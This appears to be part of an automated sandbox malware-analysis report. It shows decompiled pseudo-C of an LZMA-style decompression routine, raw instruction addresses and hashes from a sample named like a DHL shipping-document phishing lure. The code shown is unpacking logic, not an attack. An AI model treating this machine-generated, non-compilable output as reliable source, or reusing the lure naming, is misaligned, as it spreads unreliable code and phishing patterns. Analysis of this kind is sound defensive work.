                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        							goto L132;
                        						case 8:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 4);
                        								__ecx =  *(__ebp - 0x38);
                        								 *(__ebp - 0x84) = 0xa;
                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        							} else {
                        								__eax =  *(__ebp - 0x38);
                        								__ecx =  *(__ebp - 4);
                        								__eax =  *(__ebp - 0x38) + 0xf;
                        								 *(__ebp - 0x84) = 9;
                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        							}
                        							goto L132;
                        						case 9:
                        							goto L0;
                        						case 0xa:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 4);
                        								__ecx =  *(__ebp - 0x38);
                        								 *(__ebp - 0x84) = 0xb;
                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        								goto L132;
                        							}
                        							__eax =  *(__ebp - 0x28);
                        							goto L88;
                        						case 0xb:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__ecx =  *(__ebp - 0x24);
                        								__eax =  *(__ebp - 0x20);
                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        							} else {
                        								__eax =  *(__ebp - 0x24);
                        							}
                        							__ecx =  *(__ebp - 0x28);
                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        							L88:
                        							__ecx =  *(__ebp - 0x2c);
                        							 *(__ebp - 0x2c) = __eax;
                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        							goto L89;
                        						case 0xc:
                        							L99:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0xc;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t334 = __ebp - 0x70;
                        							 *_t334 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t334;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							__eax =  *(__ebp - 0x2c);
                        							goto L101;
                        						case 0xd:
                        							L37:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0xd;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t122 = __ebp - 0x70;
                        							 *_t122 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t122;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							L39:
                        							__eax =  *(__ebp - 0x40);
                        							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        								goto L48;
                        							}
                        							__eflags = __ebx - 0x100;
                        							if(__ebx >= 0x100) {
                        								goto L54;
                        							}
                        							L41:
                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        							__ecx =  *(__ebp - 0x58);
                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        							 *(__ebp - 0x48) = __eax;
                        							__eax = __eax + 1;
                        							__eax = __eax << 8;
                        							__eax = __eax + __ebx;
                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        							__ax =  *__esi;
                        							 *(__ebp - 0x54) = __esi;
                        							__edx = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        							__eflags =  *(__ebp - 0xc) - __ecx;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								 *(__ebp - 0x40) = 1;
                        								__cx = __ax >> 5;
                        								__eflags = __eax;
                        								__ebx = __ebx + __ebx + 1;
                        								 *__esi = __ax;
                        							} else {
                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edx;
                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                        							 *(__ebp - 0x44) = __ebx;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								goto L39;
                        							} else {
                        								goto L37;
                        							}
                        						case 0xe:
                        							L46:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0xe;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t156 = __ebp - 0x70;
                        							 *_t156 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t156;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							while(1) {
                        								L48:
                        								__eflags = __ebx - 0x100;
                        								if(__ebx >= 0x100) {
                        									break;
                        								}
                        								__eax =  *(__ebp - 0x58);
                        								__edx = __ebx + __ebx;
                        								__ecx =  *(__ebp - 0x10);
                        								__esi = __edx + __eax;
                        								__ecx =  *(__ebp - 0x10) >> 0xb;
                        								__ax =  *__esi;
                        								 *(__ebp - 0x54) = __esi;
                        								__edi = __ax & 0x0000ffff;
                        								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        								__eflags =  *(__ebp - 0xc) - __ecx;
                        								if( *(__ebp - 0xc) >= __ecx) {
                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        									__cx = __ax;
                        									_t170 = __edx + 1; // 0x1
                        									__ebx = _t170;
                        									__cx = __ax >> 5;
                        									__eflags = __eax;
                        									 *__esi = __ax;
                        								} else {
                        									 *(__ebp - 0x10) = __ecx;
                        									0x800 = 0x800 - __edi;
                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        									__ebx = __ebx + __ebx;
                        									 *__esi = __cx;
                        								}
                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                        								 *(__ebp - 0x44) = __ebx;
                        								if( *(__ebp - 0x10) >= 0x1000000) {
                        									continue;
                        								} else {
                        									goto L46;
                        								}
                        							}
                        							L54:
                        							_t173 = __ebp - 0x34;
                        							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        							__eflags =  *_t173;
                        							goto L55;
                        						case 0xf:
                        							L58:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0xf;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t203 = __ebp - 0x70;
                        							 *_t203 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t203;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							L60:
                        							__eflags = __ebx - 0x100;
                        							if(__ebx >= 0x100) {
                        								L55:
                        								__al =  *(__ebp - 0x44);
                        								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        								goto L56;
                        							}
                        							L61:
                        							__eax =  *(__ebp - 0x58);
                        							__edx = __ebx + __ebx;
                        							__ecx =  *(__ebp - 0x10);
                        							__esi = __edx + __eax;
                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                        							__ax =  *__esi;
                        							 *(__ebp - 0x54) = __esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        							__eflags =  *(__ebp - 0xc) - __ecx;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								_t217 = __edx + 1; // 0x1
                        								__ebx = _t217;
                        								__cx = __ax >> 5;
                        								__eflags = __eax;
                        								 *__esi = __ax;
                        							} else {
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                        							 *(__ebp - 0x44) = __ebx;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								goto L60;
                        							} else {
                        								goto L58;
                        							}
                        						case 0x10:
                        							L109:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0x10;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t365 = __ebp - 0x70;
                        							 *_t365 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t365;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							goto L111;
                        						case 0x11:
                        							goto L69;
                        						case 0x12:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 0x58);
                        								 *(__ebp - 0x84) = 0x13;
                        								__esi =  *(__ebp - 0x58) + 2;
                        								goto L132;
                        							}
                        							__eax =  *(__ebp - 0x4c);
                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        							__ecx =  *(__ebp - 0x58);
                        							__eax =  *(__ebp - 0x4c) << 4;
                        							__eflags = __eax;
                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                        							goto L130;
                        						case 0x13:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								_t469 = __ebp - 0x58;
                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                        								__eflags =  *_t469;
                        								 *(__ebp - 0x30) = 0x10;
                        								 *(__ebp - 0x40) = 8;
                        								L144:
                        								 *(__ebp - 0x7c) = 0x14;
                        								goto L145;
                        							}
                        							__eax =  *(__ebp - 0x4c);
                        							__ecx =  *(__ebp - 0x58);
                        							__eax =  *(__ebp - 0x4c) << 4;
                        							 *(__ebp - 0x30) = 8;
                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        							L130:
                        							 *(__ebp - 0x58) = __eax;
                        							 *(__ebp - 0x40) = 3;
                        							goto L144;
                        						case 0x14:
                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        							__eax =  *(__ebp - 0x80);
                        							goto L140;
                        						case 0x15:
                        							__eax = 0;
                        							__eflags =  *(__ebp - 0x38) - 7;
                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        							__al = __al & 0x000000fd;
                        							__eax = (__eflags >= 0) - 1 + 0xb;
                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        							goto L120;
                        						case 0x16:
                        							__eax =  *(__ebp - 0x30);
                        							__eflags = __eax - 4;
                        							if(__eax >= 4) {
                        								_push(3);
                        								_pop(__eax);
                        							}
                        							__ecx =  *(__ebp - 4);
                        							 *(__ebp - 0x40) = 6;
                        							__eax = __eax << 7;
                        							 *(__ebp - 0x7c) = 0x19;
                        							 *(__ebp - 0x58) = __eax;
                        							goto L145;
                        						case 0x17:
                        							L145:
                        							__eax =  *(__ebp - 0x40);
                        							 *(__ebp - 0x50) = 1;
                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        							goto L149;
                        						case 0x18:
                        							L146:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0x18;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t484 = __ebp - 0x70;
                        							 *_t484 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t484;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							L148:
                        							_t487 = __ebp - 0x48;
                        							 *_t487 =  *(__ebp - 0x48) - 1;
                        							__eflags =  *_t487;
                        							L149:
                        							__eflags =  *(__ebp - 0x48);
                        							if( *(__ebp - 0x48) <= 0) {
                        								__ecx =  *(__ebp - 0x40);
                        								__ebx =  *(__ebp - 0x50);
                        								0 = 1;
                        								__eax = 1 << __cl;
                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        								__eax =  *(__ebp - 0x7c);
                        								 *(__ebp - 0x44) = __ebx;
                        								goto L140;
                        							}
                        							__eax =  *(__ebp - 0x50);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        							__eax =  *(__ebp - 0x58);
                        							__esi = __edx + __eax;
                        							 *(__ebp - 0x54) = __esi;
                        							__ax =  *__esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        							__eflags =  *(__ebp - 0xc) - __ecx;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								__cx = __ax >> 5;
                        								__eax = __eax - __ecx;
                        								__edx = __edx + 1;
                        								__eflags = __edx;
                        								 *__esi = __ax;
                        								 *(__ebp - 0x50) = __edx;
                        							} else {
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        								 *__esi = __cx;
                        							}
                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								goto L148;
                        							} else {
                        								goto L146;
                        							}
                        						case 0x19:
                        							__eflags = __ebx - 4;
                        							if(__ebx < 4) {
                        								 *(__ebp - 0x2c) = __ebx;
                        								L119:
                        								_t393 = __ebp - 0x2c;
                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                        								__eflags =  *_t393;
                        								L120:
                        								__eax =  *(__ebp - 0x2c);
                        								__eflags = __eax;
                        								if(__eax == 0) {
                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        									goto L170;
                        								}
                        								__eflags = __eax -  *(__ebp - 0x60);
                        								if(__eax >  *(__ebp - 0x60)) {
                        									goto L171;
                        								}
                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        								__eax =  *(__ebp - 0x30);
                        								_t400 = __ebp - 0x60;
                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        								__eflags =  *_t400;
                        								goto L123;
                        							}
                        							__ecx = __ebx;
                        							__eax = __ebx;
                        							__ecx = __ebx >> 1;
                        							__eax = __ebx & 0x00000001;
                        							__ecx = (__ebx >> 1) - 1;
                        							__al = __al | 0x00000002;
                        							__eax = (__ebx & 0x00000001) << __cl;
                        							__eflags = __ebx - 0xe;
                        							 *(__ebp - 0x2c) = __eax;
                        							if(__ebx >= 0xe) {
                        								__ebx = 0;
                        								 *(__ebp - 0x48) = __ecx;
                        								L102:
                        								__eflags =  *(__ebp - 0x48);
                        								if( *(__ebp - 0x48) <= 0) {
                        									__eax = __eax + __ebx;
                        									 *(__ebp - 0x40) = 4;
                        									 *(__ebp - 0x2c) = __eax;
                        									__eax =  *(__ebp - 4);
                        									__eax =  *(__ebp - 4) + 0x644;
                        									__eflags = __eax;
                        									L108:
                        									__ebx = 0;
                        									 *(__ebp - 0x58) = __eax;
                        									 *(__ebp - 0x50) = 1;
                        									 *(__ebp - 0x44) = 0;
                        									 *(__ebp - 0x48) = 0;
                        									L112:
                        									__eax =  *(__ebp - 0x40);
                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        										_t391 = __ebp - 0x2c;
                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        										__eflags =  *_t391;
                        										goto L119;
                        									}
                        									__eax =  *(__ebp - 0x50);
                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        									__eax =  *(__ebp - 0x58);
                        									__esi = __edi + __eax;
                        									 *(__ebp - 0x54) = __esi;
                        									__ax =  *__esi;
                        									__ecx = __ax & 0x0000ffff;
                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        									__eflags =  *(__ebp - 0xc) - __edx;
                        									if( *(__ebp - 0xc) >= __edx) {
                        										__ecx = 0;
                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        										__ecx = 1;
                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        										__ebx = 1;
                        										__ecx =  *(__ebp - 0x48);
                        										__ebx = 1 << __cl;
                        										__ecx = 1 << __cl;
                        										__ebx =  *(__ebp - 0x44);
                        										__ebx =  *(__ebp - 0x44) | __ecx;
                        										__cx = __ax;
                        										__cx = __ax >> 5;
                        										__eax = __eax - __ecx;
                        										__edi = __edi + 1;
                        										__eflags = __edi;
                        										 *(__ebp - 0x44) = __ebx;
                        										 *__esi = __ax;
                        										 *(__ebp - 0x50) = __edi;
                        									} else {
                        										 *(__ebp - 0x10) = __edx;
                        										0x800 = 0x800 - __ecx;
                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        										 *__esi = __dx;
                        									}
                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                        									if( *(__ebp - 0x10) >= 0x1000000) {
                        										L111:
                        										_t368 = __ebp - 0x48;
                        										 *_t368 =  *(__ebp - 0x48) + 1;
                        										__eflags =  *_t368;
                        										goto L112;
                        									} else {
                        										goto L109;
                        									}
                        								}
                        								__ecx =  *(__ebp - 0xc);
                        								__ebx = __ebx + __ebx;
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        								 *(__ebp - 0x44) = __ebx;
                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        									__ecx =  *(__ebp - 0x10);
                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        									__ebx = __ebx | 0x00000001;
                        									__eflags = __ebx;
                        									 *(__ebp - 0x44) = __ebx;
                        								}
                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                        								if( *(__ebp - 0x10) >= 0x1000000) {
                        									L101:
                        									_t338 = __ebp - 0x48;
                        									 *_t338 =  *(__ebp - 0x48) - 1;
                        									__eflags =  *_t338;
                        									goto L102;
                        								} else {
                        									goto L99;
                        								}
                        							}
                        							__edx =  *(__ebp - 4);
                        							__eax = __eax - __ebx;
                        							 *(__ebp - 0x40) = __ecx;
                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        							goto L108;
                        						case 0x1a:
                        							L56:
                        							__eflags =  *(__ebp - 0x64);
                        							if( *(__ebp - 0x64) == 0) {
                        								 *(__ebp - 0x88) = 0x1a;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x68);
                        							__al =  *(__ebp - 0x5c);
                        							__edx =  *(__ebp - 8);
                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        							 *( *(__ebp - 0x68)) = __al;
                        							__ecx =  *(__ebp - 0x14);
                        							 *(__ecx +  *(__ebp - 8)) = __al;
                        							__eax = __ecx + 1;
                        							__edx = 0;
                        							_t192 = __eax %  *(__ebp - 0x74);
                        							__eax = __eax /  *(__ebp - 0x74);
                        							__edx = _t192;
                        							goto L79;
                        						case 0x1b:
                        							goto L75;
                        						case 0x1c:
                        							while(1) {
                        								L123:
                        								__eflags =  *(__ebp - 0x64);
                        								if( *(__ebp - 0x64) == 0) {
                        									break;
                        								}
                        								__eax =  *(__ebp - 0x14);
                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        								__eflags = __eax -  *(__ebp - 0x74);
                        								if(__eax >=  *(__ebp - 0x74)) {
                        									__eax = __eax +  *(__ebp - 0x74);
                        									__eflags = __eax;
                        								}
                        								__edx =  *(__ebp - 8);
                        								__cl =  *(__eax + __edx);
                        								__eax =  *(__ebp - 0x14);
                        								 *(__ebp - 0x5c) = __cl;
                        								 *(__eax + __edx) = __cl;
                        								__eax = __eax + 1;
                        								__edx = 0;
                        								_t414 = __eax %  *(__ebp - 0x74);
                        								__eax = __eax /  *(__ebp - 0x74);
                        								__edx = _t414;
                        								__eax =  *(__ebp - 0x68);
                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        								__eflags =  *(__ebp - 0x30);
                        								 *( *(__ebp - 0x68)) = __cl;
                        								 *(__ebp - 0x14) = _t414;
                        								if( *(__ebp - 0x30) > 0) {
                        									continue;
                        								} else {
                        									goto L80;
                        								}
                        							}
                        							 *(__ebp - 0x88) = 0x1c;
                        							goto L170;
                        					}
                        				}
                        			}













                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00000000
                        0x00407390
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                        • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                        • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                        • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00406FFE() {
                        				signed int _t539;
                        				unsigned short _t540;
                        				signed int _t541;
                        				void _t542;
                        				signed int _t543;
                        				signed int _t544;
                        				signed int _t573;
                        				signed int _t576;
                        				signed int _t597;
                        				signed int* _t614;
                        				void* _t621;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t621 - 0x40) != 1) {
                        						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                        						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                        						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                        						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                        						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                        						_t539 =  *(_t621 - 4) + 0x664;
